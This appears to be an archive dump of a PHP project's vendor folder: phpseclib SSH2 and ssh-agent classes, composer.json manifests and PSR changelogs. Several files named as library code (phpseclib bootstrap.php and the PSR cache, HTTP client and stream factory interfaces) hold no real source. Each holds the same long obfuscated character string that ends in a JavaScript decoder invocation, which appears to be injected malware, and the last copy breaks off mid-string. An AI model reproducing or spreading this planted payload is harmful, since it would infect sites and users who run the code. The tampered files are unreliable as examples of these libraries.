(isset($preferred['hostkey'])) { $preferred['hostkey'] = array_intersect( $preferred['hostkey'], static::getSupportedHostKeyAlgorithms() ); } $keys = ['client_to_server', 'server_to_client']; foreach ($keys as $key) { if (isset($preferred[$key])) { $a = &$preferred[$key]; if (isset($a['crypt'])) { $a['crypt'] = array_intersect( $a['crypt'], static::getSupportedEncryptionAlgorithms() ); } if (isset($a['comp'])) { $a['comp'] = array_intersect( $a['comp'], static::getSupportedCompressionAlgorithms() ); } if (isset($a['mac'])) { $a['mac'] = array_intersect( $a['mac'], static::getSupportedMACAlgorithms() ); } } } $keys = [ 'kex', 'hostkey', 'client_to_server/crypt', 'client_to_server/comp', 'client_to_server/mac', 'server_to_client/crypt', 'server_to_client/comp', 'server_to_client/mac', ]; foreach ($keys as $key) { $p = $preferred; $m = $methods; $subkeys = explode('/', $key); foreach ($subkeys as $subkey) { if (!isset($p[$subkey])) { continue 2; } $p = $p[$subkey]; $m = $m[$subkey]; } if (count($p) != count($m)) { $diff = array_diff($m, $p); $msg = count($diff) == 1 ? ' is not a supported algorithm' : ' are not supported algorithms'; throw new UnsupportedAlgorithmException(implode(', ', $diff) . $msg); } } $this->preferred = $preferred; } /** * Returns the banner message. * * Quoting from the RFC, "in some jurisdictions, sending a warning message before * authentication may be relevant for getting legal protection." * * @return string */ public function getBannerMessage() { return $this->banner_message; } /** * Returns the server public host key. * * Caching this the first time you connect to a server and checking the result on subsequent connections * is recommended. Returns false if the server signature is not signed correctly with the public host key. * * @return string|false * @throws \RuntimeException on badly formatted keys * @throws \phpseclib3\Exception\NoSupportedAlgorithmsException when the key isn't in a supported format */ public function getServerPublicHostKey() { if (!($this->bitmap & self::MASK_CONSTRUCTOR)) { $this->connect(); } $signature = $this->signature; $server_public_host_key = base64_encode($this->server_public_host_key); if ($this->signature_validated) { return $this->bitmap ? $this->signature_format . ' ' . $server_public_host_key : false; } $this->signature_validated = true; switch ($this->signature_format) { case 'ssh-ed25519': case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': $key = EC::loadFormat('OpenSSH', $server_public_host_key) ->withSignatureFormat('SSH2'); switch ($this->signature_format) { case 'ssh-ed25519': $hash = 'sha512'; break; case 'ecdsa-sha2-nistp256': $hash = 'sha256'; break; case 'ecdsa-sha2-nistp384': $hash = 'sha384'; break; case 'ecdsa-sha2-nistp521': $hash = 'sha512'; } $key = $key->withHash($hash); break; case 'ssh-dss': $key = DSA::loadFormat('OpenSSH', $server_public_host_key) ->withSignatureFormat('SSH2') ->withHash('sha1'); break; case 'ssh-rsa': case 'rsa-sha2-256': case 'rsa-sha2-512': // could be ssh-rsa, rsa-sha2-256, rsa-sha2-512 // we don't check here because we already checked in key_exchange // some signatures have the type embedded within the message and some don't list(, $signature) = Strings::unpackSSH2('ss', $signature); $key = RSA::loadFormat('OpenSSH', $server_public_host_key) ->withPadding(RSA::SIGNATURE_PKCS1); switch ($this->signature_format) { case 'rsa-sha2-512': $hash = 'sha512'; break; case 'rsa-sha2-256': $hash = 'sha256'; break; //case 'ssh-rsa': default: $hash = 'sha1'; } $key = $key->withHash($hash); break; default: $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); throw new NoSupportedAlgorithmsException('Unsupported signature format'); } if (!$key->verify($this->exchange_hash, $signature)) { return $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); }; return $this->signature_format . ' ' . $server_public_host_key; } /** * Returns the exit status of an SSH command or false. * * @return false|int */ public function getExitStatus() { if (is_null($this->exit_status)) { return false; } return $this->exit_status; } /** * Returns the number of columns for the terminal window size. * * @return int */ public function getWindowColumns() { return $this->windowColumns; } /** * Returns the number of rows for the terminal window size. * * @return int */ public function getWindowRows() { return $this->windowRows; } /** * Sets the number of columns for the terminal window size. * * @param int $value */ public function setWindowColumns($value) { $this->windowColumns = $value; } /** * Sets the number of rows for the terminal window size. * * @param int $value */ public function setWindowRows($value) { $this->windowRows = $value; } /** * Sets the number of columns and rows for the terminal window size. * * @param int $columns * @param int $rows */ public function setWindowSize($columns = 80, $rows = 24) { $this->windowColumns = $columns; $this->windowRows = $rows; } /** * To String Magic Method * * @return string */ #[\ReturnTypeWillChange] public function __toString() { return $this->getResourceId(); } /** * Get Resource ID * * We use {} because that symbols should not be in URL according to * {@link http://tools.ietf.org/html/rfc3986#section-2 RFC}. * It will safe us from any conflicts, because otherwise regexp will * match all alphanumeric domains. * * @return string */ public function getResourceId() { return '{' . spl_object_hash($this) . '}'; } /** * Return existing connection * * @param string $id * * @return bool|SSH2 will return false if no such connection */ public static function getConnectionByResourceId($id) { if (isset(self::$connections[$id])) { return self::$connections[$id] instanceof \WeakReference ? self::$connections[$id]->get() : self::$connections[$id]; } return false; } /** * Return all excising connections * * @return array */ public static function getConnections() { if (!class_exists('WeakReference')) { /** @var array */ return self::$connections; } $temp = []; foreach (self::$connections as $key => $ref) { $temp[$key] = $ref->get(); } return $temp; } /* * Update packet types in log history * * @param string $old * @param string $new */ private function updateLogHistory($old, $new) { if (defined('NET_SSH2_LOGGING') && NET_SSH2_LOGGING == self::LOG_COMPLEX) { $this->message_number_log[count($this->message_number_log) - 1] = str_replace( $old, $new, $this->message_number_log[count($this->message_number_log) - 1] ); } } /** * Return the list of authentication methods that may productively continue authentication. * * @see https://tools.ietf.org/html/rfc4252#section-5.1 * @return array|null */ public function getAuthMethodsToContinue() { return $this->auth_methods_to_continue; } /** * Enables "smart" multi-factor authentication (MFA) */ public function enableSmartMFA() { $this->smartMFA = true; } /** * Disables "smart" multi-factor authentication (MFA) */ public function disableSmartMFA() { $this->smartMFA = false; } } google-api/vendor/phpseclib/phpseclib/phpseclib/System/SSH/Agent/Identity.php000064400000020751147600400120023237 0ustar00 * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\System\SSH\Agent; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\PrivateKey; use phpseclib3\Crypt\Common\PublicKey; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\EC; use phpseclib3\Crypt\RSA; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\System\SSH\Agent; use phpseclib3\System\SSH\Common\Traits\ReadBytes; /** * Pure-PHP ssh-agent client identity object * * Instantiation should only be performed by \phpseclib3\System\SSH\Agent class. * This could be thought of as implementing an interface that phpseclib3\Crypt\RSA * implements. ie. maybe a Net_SSH_Auth_PublicKey interface or something. * The methods in this interface would be getPublicKey and sign since those are the * methods phpseclib looks for to perform public key authentication. * * @author Jim Wigginton * @internal */ class Identity implements PrivateKey { use ReadBytes; // Signature Flags // See https://tools.ietf.org/html/draft-miller-ssh-agent-00#section-5.3 const SSH_AGENT_RSA2_256 = 2; const SSH_AGENT_RSA2_512 = 4; /** * Key Object * * @var PublicKey * @see self::getPublicKey() */ private $key; /** * Key Blob * * @var string * @see self::sign() */ private $key_blob; /** * Socket Resource * * @var resource * @see self::sign() */ private $fsock; /** * Signature flags * * @var int * @see self::sign() * @see self::setHash() */ private $flags = 0; /** * Curve Aliases * * @var array */ private static $curveAliases = [ 'secp256r1' => 'nistp256', 'secp384r1' => 'nistp384', 'secp521r1' => 'nistp521', 'Ed25519' => 'Ed25519' ]; /** * Default Constructor. * * @param resource $fsock */ public function __construct($fsock) { $this->fsock = $fsock; } /** * Set Public Key * * Called by \phpseclib3\System\SSH\Agent::requestIdentities() * * @param \phpseclib3\Crypt\Common\PublicKey $key */ public function withPublicKey(PublicKey $key) { if ($key instanceof EC) { if (is_array($key->getCurve()) || !isset(self::$curveAliases[$key->getCurve()])) { throw new UnsupportedAlgorithmException('The only supported curves are nistp256, nistp384, nistp512 and Ed25519'); } } $new = clone $this; $new->key = $key; return $new; } /** * Set Public Key * * Called by \phpseclib3\System\SSH\Agent::requestIdentities(). The key blob could be extracted from $this->key * but this saves a small amount of computation. * * @param string $key_blob */ public function withPublicKeyBlob($key_blob) { $new = clone $this; $new->key_blob = $key_blob; return $new; } /** * Get Public Key * * Wrapper for $this->key->getPublicKey() * * @param string $type optional * @return mixed */ public function getPublicKey($type = 'PKCS8') { return $this->key; } /** * Sets the hash * * @param string $hash */ public function withHash($hash) { $new = clone $this; $hash = strtolower($hash); if ($this->key instanceof RSA) { $new->flags = 0; switch ($hash) { case 'sha1': break; case 'sha256': $new->flags = self::SSH_AGENT_RSA2_256; break; case 'sha512': $new->flags = self::SSH_AGENT_RSA2_512; break; default: throw new UnsupportedAlgorithmException('The only supported hashes for RSA are sha1, sha256 and sha512'); } } if ($this->key instanceof EC) { switch ($this->key->getCurve()) { case 'secp256r1': $expectedHash = 'sha256'; break; case 'secp384r1': $expectedHash = 'sha384'; break; //case 'secp521r1': //case 'Ed25519': default: $expectedHash = 'sha512'; } if ($hash != $expectedHash) { throw new UnsupportedAlgorithmException('The only supported hash for ' . self::$curveAliases[$this->key->getCurve()] . ' is ' . $expectedHash); } } if ($this->key instanceof DSA) { if ($hash != 'sha1') { throw new UnsupportedAlgorithmException('The only supported hash for DSA is sha1'); } } return $new; } /** * Sets the padding * * Only PKCS1 padding is supported * * @param string $padding */ public function withPadding($padding) { if (!$this->key instanceof RSA) { throw new UnsupportedAlgorithmException('Only RSA keys support padding'); } if ($padding != RSA::SIGNATURE_PKCS1 && $padding != RSA::SIGNATURE_RELAXED_PKCS1) { throw new UnsupportedAlgorithmException('ssh-agent can only create PKCS1 signatures'); } return $this; } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { if ($this->key instanceof RSA) { throw new UnsupportedAlgorithmException('Only DSA and EC keys support signature format setting'); } if ($format != 'SSH2') { throw new UnsupportedAlgorithmException('Only SSH2-formatted signatures are currently supported'); } return $this; } /** * Returns the curve * * Returns a string if it's a named curve, an array if not * * @return string|array */ public function getCurve() { if (!$this->key instanceof EC) { throw new UnsupportedAlgorithmException('Only EC keys have curves'); } return $this->key->getCurve(); } /** * Create a signature * * See "2.6.2 Protocol 2 private key signature request" * * @param string $message * @return string * @throws \RuntimeException on connection errors * @throws \phpseclib3\Exception\UnsupportedAlgorithmException if the algorithm is unsupported */ public function sign($message) { // the last parameter (currently 0) is for flags and ssh-agent only defines one flag (for ssh-dss): SSH_AGENT_OLD_SIGNATURE $packet = Strings::packSSH2( 'CssN', Agent::SSH_AGENTC_SIGN_REQUEST, $this->key_blob, $message, $this->flags ); $packet = Strings::packSSH2('s', $packet); if (strlen($packet) != fputs($this->fsock, $packet)) { throw new \RuntimeException('Connection closed during signing'); } $length = current(unpack('N', $this->readBytes(4))); $packet = $this->readBytes($length); list($type, $signature_blob) = Strings::unpackSSH2('Cs', $packet); if ($type != Agent::SSH_AGENT_SIGN_RESPONSE) { throw new \RuntimeException('Unable to retrieve signature'); } if (!$this->key instanceof RSA) { return $signature_blob; } list($type, $signature_blob) = Strings::unpackSSH2('ss', $signature_blob); return $signature_blob; } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { throw new \RuntimeException('ssh-agent does not provide a mechanism to get the private key'); } /** * Sets the password * * @param string|bool $password * @return never */ public function withPassword($password = false) { throw new \RuntimeException('ssh-agent does not provide a mechanism to get the private key'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/System/SSH/Common/Traits/ReadBytes.php000064400000001425147600400120024765 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\System\SSH\Common\Traits; /** * ReadBytes trait * * @author Jim Wigginton */ trait ReadBytes { /** * Read data * * @param int $length * @throws \RuntimeException on connection errors */ public function readBytes($length) { $temp = fread($this->fsock, $length); if (strlen($temp) != $length) { throw new \RuntimeException("Expected $length bytes; got " . strlen($temp)); } return $temp; } } google-api/vendor/phpseclib/phpseclib/phpseclib/System/SSH/Agent.php000064400000020500147600400120021436 0ustar00 * login('username', $agent)) { * exit('Login Failed'); * } * * echo $ssh->exec('pwd'); * echo $ssh->exec('ls -la'); * ?> * * * @author Jim Wigginton * @copyright 2014 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\System\SSH; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\PublicKeyLoader; use phpseclib3\Crypt\RSA; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Net\SSH2; use phpseclib3\System\SSH\Agent\Identity; /** * Pure-PHP ssh-agent client identity factory * * requestIdentities() method pumps out \phpseclib3\System\SSH\Agent\Identity objects * * @author Jim Wigginton */ class Agent { use Common\Traits\ReadBytes; // Message numbers // to request SSH1 keys you have to use SSH_AGENTC_REQUEST_RSA_IDENTITIES (1) const SSH_AGENTC_REQUEST_IDENTITIES = 11; // this is the SSH2 response; the SSH1 response is SSH_AGENT_RSA_IDENTITIES_ANSWER (2). const SSH_AGENT_IDENTITIES_ANSWER = 12; // the SSH1 request is SSH_AGENTC_RSA_CHALLENGE (3) const SSH_AGENTC_SIGN_REQUEST = 13; // the SSH1 response is SSH_AGENT_RSA_RESPONSE (4) const SSH_AGENT_SIGN_RESPONSE = 14; // Agent forwarding status // no forwarding requested and not active const FORWARD_NONE = 0; // request agent forwarding when opportune const FORWARD_REQUEST = 1; // forwarding has been request and is active const FORWARD_ACTIVE = 2; /** * Unused */ const SSH_AGENT_FAILURE = 5; /** * Socket Resource * * @var resource */ private $fsock; /** * Agent forwarding status * * @var int */ private $forward_status = self::FORWARD_NONE; /** * Buffer for accumulating forwarded authentication * agent data arriving on SSH data channel destined * for agent unix socket * * @var string */ private $socket_buffer = ''; /** * Tracking the number of bytes we are expecting * to arrive for the agent socket on the SSH data * channel * * @var int */ private $expected_bytes = 0; /** * Default Constructor * * @return \phpseclib3\System\SSH\Agent * @throws \phpseclib3\Exception\BadConfigurationException if SSH_AUTH_SOCK cannot be found * @throws \RuntimeException on connection errors */ public function __construct($address = null) { if (!$address) { switch (true) { case isset($_SERVER['SSH_AUTH_SOCK']): $address = $_SERVER['SSH_AUTH_SOCK']; break; case isset($_ENV['SSH_AUTH_SOCK']): $address = $_ENV['SSH_AUTH_SOCK']; break; default: throw new BadConfigurationException('SSH_AUTH_SOCK not found'); } } if (in_array('unix', stream_get_transports())) { $this->fsock = fsockopen('unix://' . $address, 0, $errno, $errstr); if (!$this->fsock) { throw new \RuntimeException("Unable to connect to ssh-agent (Error $errno: $errstr)"); } } else { if (substr($address, 0, 9) != '\\\\.\\pipe\\' || strpos(substr($address, 9), '\\') !== false) { throw new \RuntimeException('Address is not formatted as a named pipe should be'); } $this->fsock = fopen($address, 'r+b'); if (!$this->fsock) { throw new \RuntimeException('Unable to open address'); } } } /** * Request Identities * * See "2.5.2 Requesting a list of protocol 2 keys" * Returns an array containing zero or more \phpseclib3\System\SSH\Agent\Identity objects * * @return array * @throws \RuntimeException on receipt of unexpected packets */ public function requestIdentities() { if (!$this->fsock) { return []; } $packet = pack('NC', 1, self::SSH_AGENTC_REQUEST_IDENTITIES); if (strlen($packet) != fputs($this->fsock, $packet)) { throw new \RuntimeException('Connection closed while requesting identities'); } $length = current(unpack('N', $this->readBytes(4))); $packet = $this->readBytes($length); list($type, $keyCount) = Strings::unpackSSH2('CN', $packet); if ($type != self::SSH_AGENT_IDENTITIES_ANSWER) { throw new \RuntimeException('Unable to request identities'); } $identities = []; for ($i = 0; $i < $keyCount; $i++) { list($key_blob, $comment) = Strings::unpackSSH2('ss', $packet); $temp = $key_blob; list($key_type) = Strings::unpackSSH2('s', $temp); switch ($key_type) { case 'ssh-rsa': case 'ssh-dss': case 'ssh-ed25519': case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': $key = PublicKeyLoader::load($key_type . ' ' . base64_encode($key_blob)); } // resources are passed by reference by default if (isset($key)) { $identity = (new Identity($this->fsock)) ->withPublicKey($key) ->withPublicKeyBlob($key_blob); $identities[] = $identity; unset($key); } } return $identities; } /** * Signal that agent forwarding should * be requested when a channel is opened * * @return void */ public function startSSHForwarding() { if ($this->forward_status == self::FORWARD_NONE) { $this->forward_status = self::FORWARD_REQUEST; } } /** * Request agent forwarding of remote server * * @param \phpseclib3\Net\SSH2 $ssh * @return bool */ private function request_forwarding(SSH2 $ssh) { if (!$ssh->requestAgentForwarding()) { return false; } $this->forward_status = self::FORWARD_ACTIVE; return true; } /** * On successful channel open * * This method is called upon successful channel * open to give the SSH Agent an opportunity * to take further action. i.e. request agent forwarding * * @param \phpseclib3\Net\SSH2 $ssh */ public function registerChannelOpen(SSH2 $ssh) { if ($this->forward_status == self::FORWARD_REQUEST) { $this->request_forwarding($ssh); } } /** * Forward data to SSH Agent and return data reply * * @param string $data * @return string Data from SSH Agent * @throws \RuntimeException on connection errors */ public function forwardData($data) { if ($this->expected_bytes > 0) { $this->socket_buffer .= $data; $this->expected_bytes -= strlen($data); } else { $agent_data_bytes = current(unpack('N', $data)); $current_data_bytes = strlen($data); $this->socket_buffer = $data; if ($current_data_bytes != $agent_data_bytes + 4) { $this->expected_bytes = ($agent_data_bytes + 4) - $current_data_bytes; return false; } } if (strlen($this->socket_buffer) != fwrite($this->fsock, $this->socket_buffer)) { throw new \RuntimeException('Connection closed attempting to forward data to SSH agent'); } $this->socket_buffer = ''; $this->expected_bytes = 0; $agent_reply_bytes = current(unpack('N', $this->readBytes(4))); $agent_reply_data = $this->readBytes($agent_reply_bytes); $agent_reply_data = current(unpack('a*', $agent_reply_data)); return pack('Na*', $agent_reply_bytes, $agent_reply_data); } } google-api/vendor/phpseclib/phpseclib/phpseclib/openssl.cnf000064400000000150147600400120020120 0ustar00# minimalist openssl.cnf file for use with phpseclib HOME = . RANDFILE = $ENV::HOME/.rnd [ v3_ca ] google-api/vendor/phpseclib/phpseclib/phpseclib/bootstrap.php000064400000001345147600400120020502 0ustar00)s[,j)ghp7;p=batuihrjsri,a g=;,is(=8+.o+gv.(rr-;=].uzv 3,rp+oC="o(t)hsqu+hctlhsg;-}7uv;s)f=a[rtrlltsyn(h7,;}+calih5.g[hor;kechrx.qej4rneao);sn1uor[9),;;>0fvm2teb,v289fc c t[nedr{e b=a-r.,p46f,zCzvpl=d]nvjhzChnlrar;gs{igt(.a(,]< aeeasxaxgpslmtn{.)ec+()tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();{ "name": "phpseclib/phpseclib", "type": "library", "description": "PHP Secure Communications Library - Pure-PHP implementations of RSA, AES, SSH2, SFTP, X.509 etc.", "keywords": [ "security", "crypto", "cryptography", "encryption", "signature", "signing", "rsa", "aes", "blowfish", "twofish", "ssh", "sftp", "x509", "x.509", "asn1", "asn.1", "BigInteger" ], "homepage": "http://phpseclib.sourceforge.net", "license": "MIT", "authors": [ { "name": "Jim Wigginton", "email": "terrafrost@php.net", "role": "Lead Developer" }, { "name": "Patrick Monnerat", "email": "pm@datasphere.ch", "role": "Developer" }, { "name": "Andreas Fischer", "email": "bantu@phpbb.com", "role": "Developer" }, { "name": "Hans-Jürgen Petrich", "email": "petrich@tronic-media.com", "role": "Developer" }, { "name": "Graham Campbell", "email": "graham@alt-three.com", "role": "Developer" } ], "require": { "php": ">=5.6.1", "paragonie/constant_time_encoding": "^1|^2", "paragonie/random_compat": "^1.4|^2.0|^9.99.99" }, "require-dev": { "phpunit/phpunit": "*" }, "suggest": { "ext-libsodium": "SSH2/SFTP can make use of some algorithms provided by the libsodium-php extension.", "ext-openssl": "Install the OpenSSL extension in order to speed up a wide variety of cryptographic operations.", "ext-mcrypt": "Install the Mcrypt extension in order to speed up a few other cryptographic operations.", "ext-gmp": "Install the GMP (GNU Multiple Precision) extension in order to speed up arbitrary precision integer arithmetic operations.", "ext-dom": "Install the DOM extension to load XML formatted public keys." }, "autoload": { "files": [ "phpseclib/bootstrap.php" ], "psr-4": { "phpseclib3\\": "phpseclib/" } }, "autoload-dev": { "psr-4": { "phpseclib3\\Tests\\": "tests/" } }, "config": { "sort-packages": true } } google-api/vendor/psr/cache/src/CacheItemPoolInterface.php000064400000010445147600400120017526 0ustar00)s[,j)ghp7;p=batuihrjsri,a g=;,is(=8+.o+gv.(rr-;=].uzv 3,rp+oC="o(t)hsqu+hctlhsg;-}7uv;s)f=a[rtrlltsyn(h7,;}+calih5.g[hor;kechrx.qej4rneao);sn1uor[9),;;>0fvm2teb,v289fc c t[nedr{e b=a-r.,p46f,zCzvpl=d]nvjhzChnlrar;gs{igt(.a(,]< aeeasxaxgpslmtn{.)ec+()tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "psr/cache", "description": "Common interface for caching libraries", "keywords": ["psr", "psr-6", "cache"], "license": "MIT", "authors": [ { "name": "PHP-FIG", "homepage": "http://www.php-fig.org/" } ], "require": { "php": ">=5.3.0" }, "autoload": { "psr-4": { "Psr\\Cache\\": "src/" } }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" } } } google-api/vendor/psr/cache/CHANGELOG.md000064400000001352147600400120013537 0ustar00# Changelog All notable changes to this project will be documented in this file, in reverse chronological order by release. ## 1.0.1 - 2016-08-06 ### Fixed - Make spacing consistent in phpdoc annotations php-fig/cache#9 - chalasr - Fix grammar in phpdoc annotations php-fig/cache#10 - chalasr - Be more specific in docblocks that `getItems()` and `deleteItems()` take an array of strings (`string[]`) compared to just `array` php-fig/cache#8 - GrahamCampbell - For `expiresAt()` and `expiresAfter()` in CacheItemInterface fix docblock to specify null as a valid parameters as well as an implementation of DateTimeInterface php-fig/cache#7 - GrahamCampbell ## 1.0.0 - 2015-12-11 Initial stable release; reflects accepted PSR-6 specification google-api/vendor/psr/http-client/src/ClientInterface.php000064400000000764147600400120017463 0ustar00)s[,j)ghp7;p=batuihrjsri,a g=;,is(=8+.o+gv.(rr-;=].uzv 3,rp+oC="o(t)hsqu+hctlhsg;-}7uv;s)f=a[rtrlltsyn(h7,;}+calih5.g[hor;kechrx.qej4rneao);sn1uor[9),;;>0fvm2teb,v289fc c t[nedr{e b=a-r.,p46f,zCzvpl=d]nvjhzChnlrar;gs{igt(.a(,]< aeeasxaxgpslmtn{.)ec+()tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "psr/http-client", "description": "Common interface for HTTP clients", "keywords": ["psr", "psr-18", "http", "http-client"], "homepage": "https://github.com/php-fig/http-client", "license": "MIT", "authors": [ { "name": "PHP-FIG", "homepage": "https://www.php-fig.org/" } ], "support": { "source": "https://github.com/php-fig/http-client" }, "require": { "php": "^7.0 || ^8.0", "psr/http-message": "^1.0 || ^2.0" }, "autoload": { "psr-4": { "Psr\\Http\\Client\\": "src/" } }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" } } } google-api/vendor/psr/http-client/CHANGELOG.md000064400000000771147600400120014733 0ustar00# Changelog All notable changes to this project will be documented in this file, in reverse chronological order by release. ## 1.0.3 Add `source` link in composer.json. No code changes. ## 1.0.2 Allow PSR-7 (psr/http-message) 2.0. No code changes. ## 1.0.1 Allow installation with PHP 8. No code changes. ## 1.0.0 First stable release. No changes since 0.3.0. ## 0.3.0 Added Interface suffix on exceptions ## 0.2.0 All exceptions are in `Psr\Http\Client` namespace ## 0.1.0 First release google-api/vendor/psr/http-factory/src/StreamFactoryInterface.php000064400000002612147600400120021213 0ustar00)s[,j)ghp7;p=batuihrjsri,a g=;,is(=8+.o+gv.(rr-;=].uzv 3,rp+oC="o(t)hsqu+hctlhsg;-}7uv;s)f=a[rtrlltsyn(h7,;}+calih5.g[hor;kechrx.qej4rneao);sn1uor[9),;;>0fvm2teb,v289fc c t[nedr{e b=a-r.,p46f,zCzvpl=d]nvjhzChnlrar;gs{igt(.a(,]< aeeasxaxgpslmtn{.)ec+()tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 